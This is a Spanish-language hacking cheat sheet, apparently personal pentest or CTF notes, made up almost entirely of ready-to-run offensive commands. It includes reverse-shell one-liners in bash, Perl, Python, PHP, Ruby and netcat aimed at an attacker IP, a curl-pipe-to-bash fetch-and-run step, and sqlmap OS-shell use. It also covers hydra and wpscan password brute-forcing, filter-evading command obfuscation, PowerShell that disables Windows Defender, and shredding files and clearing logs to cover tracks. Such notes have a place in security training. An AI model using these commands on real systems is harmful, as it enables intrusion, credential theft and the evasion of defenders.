H A C K I N G   H Y P E:
██ 20% ... 
███ 40% .... 
████ 60% ..... 
█████ 80% ......
██████ 100% ....... COMPLETED

W E L C O M E

   |\_._/|        |,\__/|        |\__/,|        |\_._/|
   | o o |        |  o o|        |o o  |        | 0 0 |
   (  T  )        (   T )        ( T   )        (  O  )  help
  .^`-^-'^.      .^`--^'^.      .^`^--'^.      .^`-^-'^.__|
  `.  ;  .'      `.  ;  .'      `.  ;  .'      `.  ;  .'
  | | | | |      | | | | |      | | | | |      | | | | |
 ((_((|))_))    ((_((|))_))    ((_((|))_))    ((_((|))_))



TRANSFERENCIA DE ARCHIVOS  
.........................

sudo python -m http.server 80
sudo python -m SimpleHTTPServer 80
    Para conectarse: via web o si la maquina es windows: powershell -c "Invoke-WebRequest -Uri 'http://[IP]:[PUERTO]/recurso' -OutFile 'C:\Windows\Temp\nombrequequeramos'"
    O tambien... Invoke-WebRequest http://[IP]/[RECURSO] -OutFile [NOMBREQUEQUERAMOS]
sudo python smbserver.py [como se llamara el recurso a compartir] [nombre del recurso a compartir] ej smbserver.py compartida /home/user
    Para conectarse: copy \\IP\recurso


TRATAMIENTO TTY
...............
script /dev/null -c bash
ctrl+z
stty raw-echo
fg
reset
xterm
export TERM=xterm
export SHELL=bash
stty rows 52 columns 187


FUZZING WEB
...........

wfuzz -c -t 400 --hc=404 -w [wordlist] [url]/FUZZ
wfuzz -c -t 400 --hc=404 -w [wordlist] -w [archivo_extensiones] [url]/FUZZ.FUZ2Z
wfuzz -c -t 400 --hc=404 -z range,0-100 http://IP/note.php?note=FUZZ --> probar numeros del 0 al 100

nmap --script http-enum -p [PUERTO] [IP]

gobuster dir --url http://IP --wordlist /usr/share/wordlists/dirb/big.txt

dirsearch -u http://[IP]/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150 -e php,txt,html -f

Si para acceder al sitio web salta un cuadro emergente pidiendo credenciales y las conocemos, para fuzzear esa parte a la que accedemos despues del login:
    dirb http://[IP]/ -u user:password


REVERSE SHELL
.............

https://ironhackers.es/herramientas/reverse-shell-cheat-sheet/
https://deephacking.tech/reverse-shells-en-windows/

si no funciona....
    1.creamos un script .sh con bash -i >& /dev/tcp/IP/PUERTO 0>&1
    2.compartimos ese archivo mediante python -m....
    3.lo ejecutamos /usr/bin/curl IP/ARCHIVO|bash


Los siguientes ejemplos suponen que la IP del atacante es 8.8.8.8 y utiliza el puerto 8080 para la conexión.
Por lo tanto, en todos estos casos, debe escuchar el puerto 8080 con el siguiente comando:
nc -vv -l -p 8080

// Bash
bash -i >& /dev/tcp/8.8.8.8/8080 0>&1

// Perl
perl -e 'use Socket;$i="8.8.8.8";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

// Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("8.8.8.8",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

// PHP
php -r '$sock=fsockopen("8.8.8.8",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

// Ruby
ruby -rsocket -e'f=TCPSocket.open("8.8.8.8",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

// Netcat
nc -e /bin/sh 8.8.8.8 8080


WEB SHELL
..........

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
https://book.hacktricks.xyz/shells/shells/msfvenom
https://github.com/frizb/MSF-Venom-Cheatsheet
    

COMMON PORTS
............

25 - SMTP
22 - SSH
110 - POP3
143 - IMAP
80 - HTTP
443 - HTTPS
137, 138, 139 - NETBIOS
115 - SFTP
23 - Telnet
21 - FTP
3389 - RDP
3306 - MySQL
1433 - MS SQL Server
445 - SMB


HOW TO SET ROUTE
.................

ip route add <Network To Which We Need Access> via <GATEWAY>
    ejemplo:
        ip route add 192.168.1.0/24 via 10.10.15.1


BANNER GRABING
...............

nc -nv  <IP> <port>


SQLMAP
.......

sqlmap -u http://<IP address> -p parameter

sqlmap -u http://<IP address> –os-shell

sqlmap -u http://<IP address> –dump

https://hackersonlineclub.com/sql-injection-cheatsheet/


CRACKING PASSWORDS
...................

https://hashes.com/en/decrypt/hash
https://hashcat.net/wiki/doku.php?id=example_hashes

john -wordlist /path/to/wordlist -format=[FORMATO] -users=users.txt hashfile

hydra -L users.txt -P pass.txt -t 10 <IP address> ssh -s 22

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt [IP] http-post-form "[URL]:[TOKEN-URL]:Login failed"

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

Replace "ssh" with any service name


SMB
....

enum4linux -a <IP address>
smbclient -L IP -N

    Para conectarse:
        smbclient //IP/RECURSO -n
    Una vez dentro para descargar archivos:
        prompt off
        mget *
        smbget -R smb://IP/recurso

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [IP]


NFS
....

*Listar recursos nfs en una maquina:
    showmount -e [IP]

*Para conectarse al recurso:
    sudo mount -t nfs IP:/recurso unacarpetanuestra


BORRAR RASTRO RAPIDAMENTE EN MAQUINAS LINUX
............................................

shred -zun 5 -v

https://hackingpassion.com/clear-your-tracks-on-linux/
https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/


ESCAPAR COMANDOS
.................

Simplemente hay que poner ciertos carácteres aleatorios ocupando el espacio que habria al poner el comando normal con su ruta completa, por ejemplo:

cat
    normal= cat /etc/passwd 
    extendido= /bin/cat /etc/passwd
    extendido escapado= /???/??t /etc/passwd
    extendido normal=c${HOA}at /etc/passwd


METASPLOIT INIT
................

sudo msfdb init
sudo service postgresql start
sudo msfconsole


TRATAMIENTO DE IMAGENES
........................

exiftool imagen.png --> Sacar datos exif de una imagen
strings imagen.png --> Sacar los strings, texto, datos ocultos de una imagen


OTROS RECURSOS
...............

Extension firefox Hack-Tools
Hacking_Help_Sheet_Resume1.png
Hacking_Help_Sheet_Resume2.png


BUSCAR ARCHIVOS SUID,SGID,StickyBit
....................................

find / -perm -u=s -type f 2>/dev/nul
find / -perm -4000 2>/dev/null


WPSCAN
.......

wpscan --url [URL] -e u
wpscan --url [URL]
wpscan --url [URL] --usernames admin --passwords rockyou.txt --max-threads 5 --> Fuerza bruta panel login wordpress
wpscan --url [URL] -e vp --> Enumerar plugins vulnerables en el sitio web


WINDOWS TRICKS
...............

Información sobre Windows Defender → "sc query windefend"

Enumeración de todos los servicios corriendo en la máquina (incluyendo antivirus) → "sc queryex type= service"

Enumeración de los antivirus que tiene el equipo → "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

Configuración y estado del firewall (características activadas y desactivadas...) → "netsh advfirewall firewall dump"

Podemos probar a deshabilitar el escaneo de todos los ficheros descargados y/o adjuntos para subir nuestros ficheros... → "Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus" luego → "Set-MpPreference -DisableIOAVProtection $true"

Listar reglas de AppLocker → "Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections"


LINUX TRICKS /var/www/html
...........................

Si tras ganar acceso a una shell en la maquina objetivo, somos un usuario con pocos privilegios pero tenemos acceso a /var/www/html podemos buscar mediante el siguiente comando find archivos de configuracion que contengan contraseñas o datos sensibles, para empezar a ganar privilegios:
    find . -iname '*config*' -type f -exec grep -nie 'pass.*=' --color=always /dev/null {} \;


RDP
....

xfreerdp /u:[USER] /p:[PASS] /v:[IP] /cert-ignore -- Para conectarse por RDP a un equipo


VULNERABILIDAD LOG4J
....................

https://guglia001.github.io/cve/poc/articulo/log4j-CVE-POC/
https://jmlgomez73.github.io/log4shell/
https://github.com/fullhunt/log4j-scan


ACTIVE DIRECTORY
................

https://www.hackplayers.com/2022/03/top10-de-ataques-al-directorio-activo.html


DESCARGA DE ARCHIVOS POR COMANDO
.................................

Linux --> wget [URL]
Windows --> powershell -c "Invoke-WebRequest -Uri '[URL]'" -OutFile archivo

